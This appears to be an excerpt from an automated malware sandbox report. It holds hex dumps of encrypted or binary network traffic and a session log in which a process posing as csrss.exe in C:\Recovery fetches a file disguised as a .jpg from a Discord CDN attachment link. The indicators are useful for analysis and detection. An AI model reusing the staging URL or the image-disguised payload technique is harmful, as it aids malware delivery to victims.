                                                  2022-04-23 06:13:01 UTC188INData Raw: 3d 89 27 3e 90 23 0b 20 cd 68 96 d8 a6 b7 15 92 c5 bc 9d 54 ad ea 8d ba 27 85 06 57 88 e3 00 23 e3 f8 c7 a5 16 79 b0 dc 87 be 0c a0 d2 9f 9b bb c4 d0 33 7b 60 e9 13 21 47 02 b8 52 36 5a 56 0f ad 06 d2 5c 21 15 98 dc 14 c5 c2 8e e3 7a dc ae 1b 6a 85 74 57 59 f6 0c 05 47 9e c4 bc 2d d8 fb 56 a4 1c 50 22 10 66 50 20 77 e8 63 56 a6 89 04 6e 43 4f 25 71 49 13 e4 d7 7c e4 92 54 e9 88 4d 9e c1 46 bf 54 ea a1 72 0d 8c d4 74 4c 71 9e 47 91 15 ad 8d fc 68 b9 3e 4c 10 8e df 4e 65 69 ec ca 59 e2 1b ea f0 8e dd 14 85 3e db e3 0c 83 02 9a 3a 30 ae 0a 90 41 de 0f 47 3c c9 fa c4 6e 79 72 44 6c b7 9b df c0 fc 36 0c 61 dd 20 b3 f2 6c a9 1a cd 23 86 17 96 0f 06 4f df 57 9e 3e da 0d 35 a3 f2 90 c9 f2 7a d2 ac bf 5b 48 54 8c 94 c0 c4 9d 45 50 1f be 84 c9 e4 d5 79 18 2b 08 9d
                                                  Data Ascii: ='># hT'W#y3{`!GR6ZV\!zjtWYG-VP"fP wcVnCO%qI|TMFTrtLqGh>LNeiY>:0AG<nyrDl6a l#OW>5z[HTEPy+
                                                  2022-04-23 06:13:01 UTC191INData Raw: 39 4b ab fe 25 8d 75 1a ea dd 8e 35 b5 c9 a3 41 71 81 ed f8 79 00 32 73 a7 a5 df c7 17 3c f4 dd f8 37 7e 70 d5 3b 21 05 87 97 4c 60 88 a4 be 49 2f 77 a7 d2 41 44 e3 0d d2 3f 64 ba c2 b9 21 78 70 46 44 71 b3 34 b6 3c fe 34 4c ab ea 1d e8 7b ec b3 6a 36 6a 8c 74 11 cf 1e be fa 7b 50 9f 4b 78 6d f2 c8 25 f8 f7 1e d9 84 28 b7 5f 89 6f b2 56 dc 72 66 42 df 49 cb ff 87 9a 80 39 d3 d1 9f 11 e2 2e 43 fd 70 b4 15 c9 32 dd 39 5d ca a7 bb 75 81 64 c7 88 8a bb ca a6 30 c5 e6 d6 e8 bc 2a 9c ad 8b bd 79 6a b7 3b 08 14 ce fd df 5a ec 72 bb c6 9b 7b 7f 1a d1 ac 74 74 5f bd bc f4 96 16 e5 e9 e4 4f 0b e7 53 74 12 f8 01 d0 17 cd 39 88 77 9b b3 c8 15 38 28 6e b7 eb e7 2a fc b2 f4 f5 5d f8 c3 2c a5 8b eb d1 44 05 17 07 1c b5 99 82 07 bd cb 2f 63 f7 0a d8 45 a4 17 98 a3 a8 fb
                                                  Data Ascii: 9K%u5Aqy2s<7~p;!L`I/wAD?d!xpFDq4<4L{j6jt{PKxm%(_oVrfBI9.Cp29]ud0*yj;Zr{tt_OSt9w8(n*],D/cE
                                                  2022-04-23 06:13:01 UTC196INData Raw: 1c d9 62 29 65 65 43 85 41 1e b9 2b 9f 8c 3d c9 08 e3 81 92 e9 d4 00 9d a9 f7 c6 b0 03 ea 96 7b 1e 49 5d b7 02 17 69 5a 63 bf 12 db e3 d0 2a ea 98 6e 31 15 aa b9 af 8c 4c 77 39 e0 38 f9 6c 6b 64 43 49 60 f0 7b 45 c7 9b 4a bb ed d4 4f 8c 46 c9 c8 11 eb b0 ae 9b a5 54 0f 9f 6e 52 da bc 58 4c 51 fc 3d 4f 9c 58 88 3e 6f a0 54 62 3e 57 94 3b 55 d9 66 23 55 0b be 8e 52 9f e2 bb 33 ab 4e 43 e0 f3 7c 8c c4 05 4c c0 b7 79 83 01 e4 a7 96 f3 41 bf 22 1b ae 09 53 34 3e 7d bc 34 b0 ec 80 b6 7d 95 81 be d9 39 b7 e8 2b 1b f0 3c 16 a1 df 2e ff 74 92 ed 70 4f aa 01 71 a3 6b 15 49 3d f2 47 42 5d bf 83 02 12 c0 9a 7d 0d 2a 74 64 ea 02 69 df b9 21 1a 42 6d 60 93 a1 e4 2e f0 d2 c8 4a 4e 72 2c ae 78 54 f7 1f 68 7b e8 96 1f 84 3e 36 d6 50 aa be 15 6b 6a 68 91 14 f0 c6 84 b1 ad
                                                  Data Ascii: b)eeCA+={I]iZc*n1Lw98lkdCI`{EJOFTnRXLQ=OX>oTb>W;Uf#UR3NC|LyA"S4>}4}9+<.tpOqkI=GB]}*tdi!Bm`.JNr,xTh{>6Pkjh
                                                  2022-04-23 06:13:01 UTC200INData Raw: 85 76 12 75 67 5c 5b 95 48 5c 64 8a 62 c8 b9 fc e9 03 c0 e9 95 38 6a 56 ff 5c 06 e3 7a 22 18 8f 59 e8 81 29 cc 49 b2 b7 b5 be df 76 5c 9d b8 c3 f4 c4 a8 a4 d5 34 f6 90 c7 d6 0e 1d 79 b6 98 7c 7c 1a a0 e4 f6 65 28 49 92 85 4f cc 55 93 fc 18 0b 84 70 4d 08 47 68 5e 0c 8a c8 11 ad 5a 3a c3 25 b6 df af 1f 67 ce ff 6b 00 12 6b ac 60 78 7b 5f dc 4a 98 5e 4f 2e 93 2e 91 f6 bf 44 fe a5 64 5e 84 78 ea e9 cc 64 75 79 f0 a6 c0 1b 11 28 86 24 64 d4 4c 70 5e 3f e9 6f ce b6 5a bf a2 bf 3e 21 dc 53 d3 ec 05 2f 29 ea 42 b3 63 c6 02 74 5d db 50 a3 5d 2e 3f 1b cb e2 7e cb 75 38 de 42 74 3b 73 06 6b 7b 18 43 f1 06 32 f6 14 c4 99 78 46 b8 41 60 b4 e3 65 fd e6 1c 31 48 4c 27 79 9b ac 1a f7 1e 55 39 56 43 2e e0 55 15 7a 9a e8 5e 7a e8 f7 8d 22 5f 93 b6 85 84 80 93 a5 ba 5a 5b
                                                  Data Ascii: vug\[H\db8jV\z"Y)Iv\4y||e(IOUpMGh^Z:%gkk`x{_J^O..Dd^xduy($dLp^?oZ>!S/)Bct]P].?~u8Bt;sk{C2xFA`e1HL'yU9VC.Uz^z"_Z[
                                                  2022-04-23 06:13:01 UTC204INData Raw: d7 27 3d ff ce f7 52 6f 90 bd 34 5b dd d4 f2 74 aa 42 60 98 4b e8 86 8f 0a e3 4f 90 8e 5d f8 78 31 5e c5 09 bc 5f 2f b1 e1 3c 2f b6 5a 37 94 3a af 46 d2 9f da f9 e0 bb b4 bf bb 53 29 9e 3c 6c d9 6e 34 e7 ee 2d 4f fe 51 ee 8e f9 ae 83 fc fd 91 dc ce 7d 63 08 d8 bf 70 c6 b2 b2 78 1d 8b d9 09 25 62 20 de 3e 09 22 ff 1b 3e 38 12 d2 ed 64 76 d4 7b bb a9 1c 28 11 a1 8d 15 a6 77 7a 29 ac f3 42 08 86 bf fd f8 f8 c7 29 60 2a f8 dc 3a 09 12 2e dd ec 3f fb 35 5d e1 cb 25 0a e0 24 25 4d 10 30 5f 55 46 2b e2 ef 7f 97 14 91 2a 1c 99 7c c6 af c1 a5 21 6b 01 3e 4a 9f de 57 9c 3d ac f3 c1 f5 d2 b0 c0 e5 92 62 b4 93 c9 33 31 ac 6d e0 81 1c 99 6a 35 5d f6 c3 14 60 3f e1 c7 8d 23 de a5 80 fa 3c d1 5a 65 23 89 67 5f 1f 50 b6 f7 74 13 32 2c a2 e8 99 63 11 6a 77 94 a4 6f 47 9c
                                                  Data Ascii: '=Ro4[tB`KO]x1^_/</Z7:FS)<ln4-OQ}cpx%b >">8dv{(wz)B)`*:.?5]%$%M0_UF+*|!k>JW=b31mj5]`?#<Ze#g_Pt2,cjwoG
                                                  2022-04-23 06:13:01 UTC208INData Raw: aa f7 e7 1d b1 04 24 69 14 0b fa bb c6 8c 54 96 d4 12 a2 dd 1a 81 b5 1b b6 01 d3 dc d7 71 74 cb f4 84 9c 58 81 05 ac c0 48 d0 4f fb 3c 40 fd d0 d4 77 93 6d d5 cf 2e 92 c7 73 d7 7b 6e c7 e4 df bd 89 e3 c0 df 2d e2 68 27 42 a1 f9 ff 1b 29 73 dc 2d 51 f8 4f 01 ef af 0b 1f 89 e1 15 f4 aa 22 c0 7d 4a 42 d2 98 7d 54 55 46 3b 76 a4 e0 46 7a 8d 34 80 71 a8 6b ed ec ef ca 7b 86 7f eb bd ad 4f 79 1d 12 c9 ee 4a 73 43 1f ad 77 6f c6 6e c0 96 4b 1f ae bc c2 f2 44 f5 77 bd 25 21 2f ca f9 b2 d8 27 98 b3 9e 4a f7 0c e1 b4 cb 9a 43 ac 4f 85 fe fb 17 35 a7 76 da ec 3e 49 8b 34 f4 f5 e2 22 b4 43 3c be fc cf 33 0b 79 07 bb 1a bc 47 bb cb 9e 8e 05 06 f9 3e 86 93 ef e9 1b 22 e4 88 60 81 60 83 41 a0 b5 88 ba f0 6c 7d ba e9 93 67 4e be 62 06 1c 82 a1 74 a1 91 38 55 0f 3c 75 10
                                                  Data Ascii: $iTqtXHO<@wm.s{n-h'B)s-QO"}JB}TUF;vFz4qk{OyJsCwonKDw%!/'JCO5v>I4"C<3yG>"``Al}gNbt8U<u
                                                  2022-04-23 06:13:01 UTC212INData Raw: d3 a7 28 73 ce da ca 35 c6 71 de 1e 29 7a 8a 7d 1d 60 59 11 04 18 ab 6b 53 34 c7 1f e1 68 a1 bb 76 66 b3 a1 f1 fe a1 51 b1 a0 c2 15 0a 15 0f 07 78 04 e7 e4 24 cd e2 ce 5c 3e e5 a8 28 3e c4 cb 10 ac af 0a ad 92 1a 72 fc 35 ad eb 0a d3 9d 53 25 5c e3 f9 f9 5a 50 81 36 32 5e 3d d5 74 9e 9b 23 ae 2d 33 f0 33 ad e2 5b f1 e0 c3 57 dd e7 4c e6 f1 0b 93 e2 15 35 28 10 f1 7b c8 fd e9 7b cf 9c a3 ef c9 3b 40 90 d8 55 7d ef cd 1c 2a 67 67 f6 45 a6 42 e9 99 90 47 a5 40 17 a7 a2 8e 8e 20 66 b1 f5 88 8c 27 c3 5d 51 f4 d0 0e 81 80 64 5c 09 93 92 39 66 a7 06 1d 16 b9 d4 8a ed 27 ba e5 ef 78 78 9a 6a 07 ea 32 a5 91 22 31 b5 aa 73 7c 11 f8 7e b2 c5 62 68 93 3e 56 1a cf 26 e6 57 b1 4d 6f a6 6e dc 81 7f 6b ea b4 97 d7 37 31 5e 90 a5 f7 05 68 9a b2 de 4e 5b 55 e3 bd 30 d7 c4
                                                  Data Ascii: (s5q)z}`YkS4hvfQx$\>(>r5S%\ZP62^=t#-33[WL5({{;@U}*ggEBG@ f']Qd\9f'xxj2"1s|~bh>V&WMonk71^hN[U0
                                                  2022-04-23 06:13:01 UTC223INData Raw: 5d 23 8b 32 e9 05 60 cd 49 25 4b 21 28 44 40 71 5a cb 5f 4a 5a 86 51 9f 73 8d c9 95 65 1a 2d e0 a9 c7 11 ff b5 28 21 a4 92 c6 ea 81 e6 03 00 51 1f 75 13 21 15 75 98 7c 21 76 5d 88 ed 31 9a 1a 15 4a e1 32 16 dc 5b e2 49 d8 f0 c9 7f 40 b4 3c f1 28 08 04 26 9a 3d 8c 84 05 c1 c3 44 46 5a e9 35 61 cd 85 10 e2 52 e9 62 64 42 da 08 cb 1f 1d d3 d4 0e 97 da 9a c8 c3 68 ca ab a8 e6 75 9e 13 3e e1 3e fe 7b a8 d2 96 6f b3 50 10 e8 f4 7a 26 62 31 f6 68 0e ed ff 2e d5 2e 15 68 73 0f 3d 1c d1 ae 07 d8 ba 09 ad cc ab eb 8d ad 74 2d f8 e9 96 94 65 0d 3e 97 bf b8 20 92 4c 35 9c 30 b0 8e 34 9f cf 73 42 99 1c 9f 6d 63 b3 4b d3 45 9f 1f b3 f8 14 36 f0 89 95 c9 df c8 f8 c3 2d ef 91 12 cf 43 0c f5 bf 64 b7 4c 6a 99 d1 64 ea 63 79 41 dc 18 7e ec 74 b6 ed 73 dd b3 29 b1 27 e8 83
                                                  Data Ascii: ]#2`I%K!(D@qZ_JZQse-(!Qu!u|!v]1J2[I@<(&=DFZ5aRbdBhu>>{oPz&b1h..hs=t-e> L504sBmcKE6-CdLjdcyA~ts)'
                                                  2022-04-23 06:13:01 UTC228INData Raw: 48 f2 b1 9a 91 b4 33 78 b2 15 10 ed aa 02 19 51 0e 99 ae a3 0a 98 2e 18 1b af 44 29 e9 de 53 d2 72 8f 66 b4 a5 3c 1d d5 2c 72 fe 9e 46 e7 98 d4 ee 14 e4 f1 ff 87 12 e9 a0 97 a7 78 d9 e9 47 d7 1b 81 e1 2f d6 c5 40 04 0a 91 68 41 c2 e3 c6 f9 ed e4 26 b6 2f ed b9 94 db b7 01 ee b7 a0 9e 07 1b f9 10 90 a7 48 05 54 b2 a2 4c 60 a6 51 13 f6 55 54 8a 13 30 5a 06 49 86 00 57 0f 19 fe 24 1e 9e bf bf 98 95 fe a0 f4 b0 1d 04 f6 dc 06 e7 13 35 13 dc a7 4f 9a 37 8e 3c a2 99 94 e1 95 9f fc 90 ec 4d b0 ac 42 fe 8c 5f 49 56 39 ef 46 2b 60 49 fe 0e 41 9f 32 17 bc a4 93 4e 41 23 a8 f4 22 0f ac df 5d 52 94 29 ce d5 d1 b7 51 e5 85 80 c8 98 cc 31 b9 87 59 fd 59 5d 9b fc d6 31 04 7a 76 8e 1b bb ca 3b c6 8c 5e a7 d5 66 f0 70 25 9b 1a c0 e2 d7 77 15 55 89 b5 11 25 ab 01 cc 18 17
                                                  Data Ascii: H3xQ.D)Srf<,rFxG/@hA&/HTL`QUT0ZIW$5O7<MB_IV9F+`IA2NA#"]R)Q1YY]1zv;^fp%wU%
                                                  2022-04-23 06:13:01 UTC244INData Raw: e9 b4 3d 63 16 ad a3 d3 5e 2e c8 39 57 a8 22 0d 03 e4 9a c5 48 a1 25 64 bc a0 8a b0 21 30 48 2b 56 e7 30 cf ba 2f 24 b1 ab e8 41 8d e1 96 7a 5f 8d 91 b7 76 d9 9d c9 1c 5b ff 57 85 72 0e e2 93 9d 5b f6 ad 68 8e 0a da a9 2b 36 a5 9e 7f 68 89 88 10 c4 90 3b 53 6f 71 72 3e 97 41 48 47 cd e4 91 9e c8 ee 52 2d 8f bb 2d a7 e5 2f 77 e4 18 7a a4 30 84 85 aa 22 79 4b 1e 11 2b 46 9d ce f7 15 59 28 97 e7 1d 93 87 db 34 14 b8 96 e0 f2 1d c0 1b d3 90 4d a0 7b e8 06 58 2f 61 c6 b8 07 4f d5 76 24 61 7f 8c 4a d1 b6 53 75 66 b5 2f a4 67 57 11 16 53 6e f4 50 1d 18 1c 62 8c a4 76 b5 ab 7a 8b 5d 42 34 73 2a f1 e9 ba 28 3a 31 de 6c d9 c8 80 25 4b 77 72 08 70 39 fb ab 1e 08 37 f0 28 df 95 db 55 53 c5 0e a4 91 2b 85 30 38 79 2d 18 0a 6b db 87 06 44 db 4c 81 96 47 23 6e 0b 99 cf
                                                  Data Ascii: =c^.9W"H%d!0H+V0/$Az_v[Wr[h+6h;Soqr>AHGR--/wz0"yK+FY(4M{X/aOv$aJSuf/gWSnPbvz]B4s*(:1l%Kwrp97(US+08y-kDLG#n
                                                  2022-04-23 06:13:01 UTC255INData Raw: 0f 45 9b 09 27 64 3c f7 40 d1 c5 1b 59 b9 56 b0 8c 95 6e a0 24 d3 cb 75 17 18 06 f1 db aa 7a e1 11 a5 1f 45 63 6c 81 51 65 fb f8 1c bb 66 c3 39 73 5a 04 67 cc 19 29 50 d9 42 83 49 2c 3f f1 91 9e 3d 3c 81 6b 51 45 27 2e b3 8d 32 6e 0d b0 ae 93 32 93 d7 c3 ce 35 fb a3 6d 07 ae 1c f9 17 68 10 00 04 14 2c 34 a2 c3 8a 69 4e e6 77 a7 a9 3f fc 53 25 1a f6 23 fd 15 ed fb de 3f 1a 86 c9 f7 fa a7 30 74 2e f0 2b 66 04 64 05 20 89 8d e1 c5 69 6e 2b ea 56 60 a7 59 d3 10 fe 37 36 2e f5 70 74 d0 84 1a 82 68 05 88 32 37 e6 3d 8a fd 21 98 93 31 6c ad 3f 9d 23 5d 31 65 2c 9c 79 cd 5c 4c 1d ea 19 ec 99 8e 2e 6e c8 d3 f5 5c 79 48 ec b5 a0 1d af 64 41 0b 0e 1a bd 54 4d 6b 29 d5 12 94 16 fb 28 9c 2b 67 86 50 03 28 5e aa e9 3a 17 a5 5b 7b eb 51 c5 c2 b1 f8 8a a0 46 45 43 4d 24
                                                  Data Ascii: E'd<@YVn$uzEclQef9sZg)PBI,?=<kQE'.2n25mh,4iNw?S%#?0t.+fd in+V`Y76.pth27=!1l?#]1e,y\L.n\yHdATMk)(+gP(^:[{QFECM$
                                                  2022-04-23 06:13:01 UTC271INData Raw: 22 a3 e7 02 ae b9 11 8c b7 1d cb db fb 20 2a bb c5 79 6b 6a d2 96 ef ab cd 57 e5 07 7d 33 69 0f 83 7e bf 04 ba b9 70 ce 54 e7 ce ec 40 49 38 b3 5e 43 da de 0c 67 02 db 0d a5 e9 4b 29 7d 59 bd 49 26 cf 74 7a 68 f8 01 de 42 cc b0 ac 74 b1 c2 10 31 38 98 e1 32 36 12 bc aa d0 a4 ae 93 64 e9 1c 1a 51 fa 72 6b 49 eb b3 ee f8 7f 59 d6 f3 a0 af 3b ad 7e 6f b4 8d c0 ed 11 10 4b 70 e2 7a b4 90 d3 88 60 b9 4e 33 55 ab 70 de ce a0 b6 64 99 94 08 4d e6 50 38 5f 08 ca 38 da ad 8a 6e 52 d0 05 27 df e9 64 61 52 f4 b6 96 1a 99 92 d4 28 95 6f 18 23 d1 c2 8e 8f d1 12 ce b3 20 42 cc a6 06 7c 7b 22 0c 30 55 50 10 6f 09 5c fc f1 22 26 76 b6 a3 e2 50 ae b3 9c e7 22 4a 98 b6 89 af 28 a3 26 e1 99 a4 f6 02 3c c6 83 f1 d6 9d 1a 2b 40 ee e4 9f 33 5a fa 71 bc f7 95 30 90 74 c9 11 eb
                                                  Data Ascii: " *ykjW}3i~pT@I8^CgK)}YI&tzhBt1826dQrkIY;~oKpz`N3UpdMP8_8nR'daR(o# B|{"0UPo\"&vP"J(&<+@3Zq0t
                                                  2022-04-23 06:13:01 UTC287INData Raw: 3d af 89 e1 66 3b 7b 30 4e df e1 a5 a2 7e bf 82 3d 2f 11 a2 d5 2c 85 58 17 9a 55 ae 54 8b 42 b6 91 38 91 fb b7 67 72 8c f8 f3 0f e6 c8 f9 83 df d4 8a 19 a2 ec cd 2f 76 b0 93 5e be cb 44 7e d8 8e ad 34 5b 53 6e 99 42 b0 fb 55 7a 8d 75 19 b0 e3 f9 1f da 85 53 b5 45 91 cf 28 eb 21 63 34 24 6b e5 01 9d 0a 63 20 aa 72 82 8f 75 f2 20 ba 21 dc 71 75 a5 ec 7a 1c 91 a9 15 3d 41 c9 99 ce fe 0d fa 67 4b 93 5e 69 e4 8e 94 10 f4 f5 05 97 c5 55 82 1d b7 b5 ca 63 10 25 f3 0e c9 83 e7 24 df e3 d1 21 96 2c 88 c2 5e e1 58 30 cb 72 00 7c 5c f0 2b f0 c5 d1 f9 2c 51 e0 98 e5 9d f5 2d f4 a8 7c 86 2d 6a 53 ea 3e ba e4 dc ee 08 5b 16 76 a9 c7 6d d5 15 09 b0 d7 8d e3 c1 4c c8 ec 4d 3e 8f 4f 9f ae c0 94 e9 e1 a3 b0 e0 8d 07 70 9f 1c f5 b3 90 c7 c6 89 8b c9 dd 68 4b ea a7 21 84 39
                                                  Data Ascii: =f;{0N~=/,XUTB8gr/v^D~4[SnBUzuSE(!c4$kc ru !quz=AgK^iUc%$!,^X0r|\+,Q-|-jS>[vmLM>OphK!9
                                                  2022-04-23 06:13:01 UTC303INData Raw: 92 0c f3 8a c4 3f 66 f7 32 e0 9b f4 5e f7 2d 37 08 9e 57 43 08 c6 08 35 05 b3 6a 6b e9 4d 2f fd a2 f5 28 91 74 3d b6 89 2d 09 6a 99 3f ce 07 fe 6c 26 2c 3a 17 e9 69 b2 95 60 17 dc 8e b8 53 8c 7b 06 42 90 98 3c c5 d8 47 ef 2e 9f 0e ce 78 56 14 cc bd c7 2c 1b 84 72 d3 84 6e fe ef f5 26 33 e4 db f6 19 ab 8f d8 ad 13 93 3a ce d6 8d 61 30 e3 59 a3 b8 9b cc c6 a0 e1 c2 84 41 97 05 07 e9 4b fb 89 24 8e 89 eb 59 d1 31 ce 58 89 c9 04 d5 16 f5 21 8d d4 4f 20 5a a4 49 77 85 23 80 3d 10 4a 7d 5e 21 a1 41 39 f2 07 38 9e e4 f0 d8 74 ac 54 be 0a e2 3b 17 b1 c0 48 99 38 47 e5 5b d4 c8 e3 27 c7 ed 71 54 ee d0 ed f0 d1 63 60 f1 b9 80 b1 c9 21 18 f3 72 00 d4 f1 81 5a f7 5f 77 c3 e7 84 9a 9c f4 d6 ff 46 c8 8a e9 75 94 6a 01 33 85 12 db 66 7b 2a 37 aa 23 ac 51 5a f4 97 38 fd
                                                  Data Ascii: ?f2^-7WC5jkM/(t=-j?l&,:i`S{B<G.xV,rn&3:a0YAK$Y1X!O ZIw#=J}^!A98tT;H8G['qTc`!rZ_wFuj3f{*7#QZ8
                                                  2022-04-23 06:13:01 UTC319INData Raw: 40 8a d7 da ae ba 2b b7 63 3c 9b e1 ae d9 e4 08 6b 8f f9 ff 16 3c dd 75 ea df a6 ac 17 b4 ec d5 5e 9e bc 90 3e ea bc ee b3 cf d5 9d cd 93 63 9b f9 ae a9 60 15 e5 69 6b fc cf 59 61 5e 66 18 aa 87 60 6d a9 e6 16 45 a7 c4 cb 66 89 a5 cf 87 45 0d d4 f0 22 5a ad 22 14 64 36 98 29 68 3b 0e f7 4a 4b b6 29 b4 b1 b8 6e b0 fe 55 8b ac 07 60 46 4a 77 90 1f 44 1b 4b b2 3f 2c 77 fa 6e 26 e2 3d 5e 6a 82 2b 16 94 6d 9b 76 c7 f1 0a 4d 61 98 7d 30 29 e4 55 58 c1 a3 9d ae 4b 60 f8 21 31 6d 08 81 60 17 a3 5e 6e d5 31 69 18 c5 23 f7 79 bc 69 d4 08 fd 5c ff 2b 5c a7 26 38 6b 0f 44 af 3e 29 96 03 bd fd b7 9f 46 9c 00 06 f5 bd d9 f9 e9 26 63 30 5d 47 56 65 86 90 45 3e 70 8e 5d 5c ae 42 42 f8 fd 03 f3 98 dd c1 db 8e 2e ba f9 cc 12 a7 41 40 45 b2 5a d4 59 cf 00 4a bb ec 56 b5 8c
                                                  Data Ascii: @+c<k<u^>c`ikYa^f`mEfE"Z"d6)h;JK)nU`FJwDK?,wn&=^j+mvMa}0)UXK`!1m`^n1i#yi\+\&8kD>)F&c0]GVeE>p]\BB.A@EZYJV
                                                  2022-04-23 06:13:01 UTC335INData Raw: 21 75 8a a4 57 ea 76 64 61 06 af 04 01 07 2f 5f c1 59 ce 30 b9 6e 6c c2 b3 b8 bc 0a a5 7e a6 e9 48 6b 5f 2d 61 14 e2 f6 5b 81 f6 48 97 9e d5 dc c5 d9 f1 ec 8f e7 cb 1f 8d f1 6d 3c 94 2d a7 54 77 0f 55 c7 88 d6 a3 68 ac 2d ac 08 f7 1b 20 ae 21 1b 34 99 ee 83 9a 14 ab de 0c c9 84 e9 d5 6b fb 37 8b 51 36 82 a8 6b d5 bc 20 f0 83 1d ad e1 1c a6 74 66 3d d8 07 a9 0e 06 8f 2e dc cd fa e8 bd fa 20 9b 6f d4 a4 8a ee 13 7e b8 e8 06 0b f6 34 43 53 a7 e6 d5 05 1b 61 06 b5 dc 55 33 38 9a 04 99 98 6e 76 e4 f1 0c e9 f1 29 a7 74 1b 75 60 0a 15 83 b0 b8 97 09 eb 17 22 77 ba 30 67 57 50 03 d2 92 63 03 84 1b 36 90 36 f4 c7 89 b8 49 15 ce 04 7c bd 2e 64 e4 4b 83 22 1d 2e c8 01 71 04 02 05 5e ad ff 23 2a 52 59 7c 48 de c9 ff 04 99 77 76 96 29 51 fa 8c 5f ea 26 6c 28 e3 5a 55
                                                  Data Ascii: !uWvda/_Y0nl~Hk_-a[Hm<-TwUh- !4k7Q6k tf=. o~4CSaU38nv)tu`"w0gWPc66I|.dK".q^#*RY|Hwv)Q_&l(ZU
                                                  2022-04-23 06:13:01 UTC351INData Raw: ba 50 c0 fb 76 8e 34 6c c6 27 bd 9e 1b 8f 17 13 be 49 db da 6a 85 42 00 b7 54 c1 ed 54 86 71 39 85 7f f5 eb 55 af 21 58 ab 4e dc f2 53 a0 07 35 99 33 ac a9 17 ee 76 07 b9 10 88 e2 55 b0 21 61 f6 25 b7 a6 01 ff 77 11 86 1e d7 f5 53 a6 35 6b d7 25 86 fa 19 f5 70 10 ba 74 df 87 27 c3 c6 13 b3 57 c2 7d 8c 4d dd 63 c1 80 1f 87 27 4a b7 27 aa 01 9f b9 d4 8f 12 d3 77 8b 02 2c b0 6e fb b9 04 e4 65 63 d8 01 be cf 4e 94 11 36 b3 16 96 84 70 95 00 01 be 44 d0 52 f2 16 8a b6 17 fa 66 22 b2 48 c2 dc 62 98 12 55 f2 17 8e b6 16 c6 52 40 b2 50 c4 93 66 86 10 55 a0 59 84 b2 4d a1 29 77 d9 65 a4 bd 02 e5 70 54 bd 15 d5 e4 10 a2 60 75 d0 20 90 91 19 d4 40 1f bf 5a ca fa 5b 9f 28 67 ce 2a 9f bb 11 fa 6e 3f bb 59 ce fa 7b bb 2b a3 4c 8a 8e e8 33 e7 f3 19 26 94 21 68 15 a0 0c
                                                  Data Ascii: Pv4l'IjBTTq9U!XNS53vU!a%wS5k%pt'W}Mc'J'w,necN6pDRf"HbUR@PfUYM)wepT`u @Z[(g*n?Y{+L3&!h
                                                  2022-04-23 06:13:01 UTC367INData Raw: 27 00 00 00 00 28 01 00 00 2a dc 0a 00 00 07 6f 07 06 2c 07 0a de 00 de 26 03 de 26 0a 00 00 c2 6f 08 06 00 00 8f 6f 06 00 01 19 6f 06 00 01 66 28 07 0a 00 00 bb 6f 0a 00 00 c1 28 a2 06 00 00 bb 28 65 95 d1 36 20 1c 25 a2 0a 00 00 c0 6f 06 00 00 cb 28 1b 25 a2 06 00 00 bb 28 65 95 d1 12 20 1a 25 a2 0a 00 00 bf 28 04 12 04 13 0a 00 00 be 28 04 12 04 13 0a 00 00 bd 28 19 25 a2 06 00 00 bb 28 65 95 d0 f0 20 18 25 a2 0a 00 00 bc 28 17 25 a2 06 00 00 bb 28 65 95 d0 bb 20 16 25 01 00 00 85 8d 1d 06 00 00 bb 28 65 95 d0 a9 20 08 0a 00 00 bb 6f 06 00 00 bb 28 65 95 d0 9b 20 06 00 00 bb 28 65 95 d0 88 20 08 0c 0a 00 00 ba 73 00 00 00 c6 dd 05 2c 09 0d 17 01 2b 06 00 00 cd 28 07 2d 06 00 00 cc 28 00 00 2b 0b 03 2b 26 03 2d 1e 0a 00 00 b9 73 00 de 26 f7 2b 0a 00 00
                                                  Data Ascii: '(*o,&&ooof(o((e6 %o(%(e %(((%(e %(%(e %(e o(e (e s,+(-(++&-s&+


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.649721162.159.130.233443C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-04-23 06:14:45 UTC379OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2022-04-23 06:14:45 UTC379INHTTP/1.1 200 OK
                                                  Date: Sat, 23 Apr 2022 06:14:45 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 387072
                                                  Connection: close
                                                  CF-Ray: 700475f64f50993f-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 454
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "fce090eab4bfe6a3d63ebc34f3979aaf"
                                                  Expires: Sun, 23 Apr 2023 06:14:45 GMT
                                                  Last-Modified: Fri, 11 Feb 2022 19:48:42 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1644608922184980
                                                  x-goog-hash: crc32c=wezq3g==
                                                  x-goog-hash: md5=/OCQ6rS/5qPWPrw085earw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 387072
                                                  X-GUploader-UploadID: ADPycdtKqfssV5gXSEkEU-GSIerpxp8CHIbDYFk25SOnHq78HplyaMuQo1jVekgXmuj72goZFfCtCGw0Rr6hHXhhv5O64hS4RUso
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NMAUa%2FdLF3MjmFsnnXHw4EoGQjHjWy1B7DduYAXQOwYEjvC3QXDTS877ChgXpZjX%2BdVuogvXoguTPGm79nHGhnc2e%2BOPQG3ZU%2B19dMFR%2FIqlAMQJRn3g3m0E9W0uvsrMSGZcbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  2022-04-23 06:14:45 UTC380INData Raw: 0d 0a
                                                  Data Ascii:
